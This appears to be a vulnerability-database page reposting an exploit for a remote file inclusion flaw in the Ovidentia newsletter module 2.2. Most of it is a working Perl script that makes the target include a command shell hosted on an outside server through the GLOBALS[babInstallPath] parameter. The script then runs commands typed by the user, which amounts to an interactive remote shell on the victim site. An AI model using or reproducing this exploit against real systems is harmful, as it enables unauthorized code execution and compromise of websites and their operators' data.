Ovidentia Module newsletter RFI Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040622 漏洞类型
发布时间 2015-12-22 更新时间 2015-12-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120242
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+|
|+| Exploit Title : Ovidentia Module newsletter RFI Vulnerability
|+| Exploit Author : 4TT4CK3R
|+| HomePage : http://www.ovidentia.org
|+| Google Dork : No
|+| Tested on : Kali Linux , Windows 8.1
|+| Date : 2015/12/21
|+| Version : 2.2
|+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+|
|+|
|+| Proof-of-Concept:    /newsletter-2-2/programs/admin.php line 3
|+|                      require_once($GLOBALS['babInstallPath'].'admin/acl.php'); 
|+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+|
|+|
|+| Exploit :
use LWP::UserAgent;
  
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
  
if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}
  
head();
  
while()
{
       print "[shell] $";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);
  
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'programs/admin.php?GLOBALS[babInstallPath]'.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not Connect\n";
  
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;
  
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
  
elsif ($return =~/failed to open stream: HTTP request failed for this target !!!/ || $return =~/: Cannot execute a blank command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br./>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
  
if($return =~ /(.*)/)
  
  
{
       $finreturn = $1;
       $finreturn=~ tr/[....]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}
  
else {print "[shell] $";}}}last;
  
sub head()
 {
 print "\n============================================================================\r\n";
 print "  *Ovidentia Module 2.2 newsletter RFI Vulnerability*\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: sploit.pl [someone] [cmd shell location] [cmd shell variable]\r\n\n";
 print " <Site> - Full path to phgstats ex: http://www.someone.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.someone/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print " Vulnerability Discovered by : 4TT4CK3R  >>>  Just for CyberPolice!!        \r\n";
 print "============================================================================\r\n";
 exit();
 }
|+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+|

|+| Discovered & Exploited by : 4TT4CK3R
|+| Just For CyberPolice
|+| I LovE IraN AnD AshiYanE SecUritY TeaM

|+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+||+|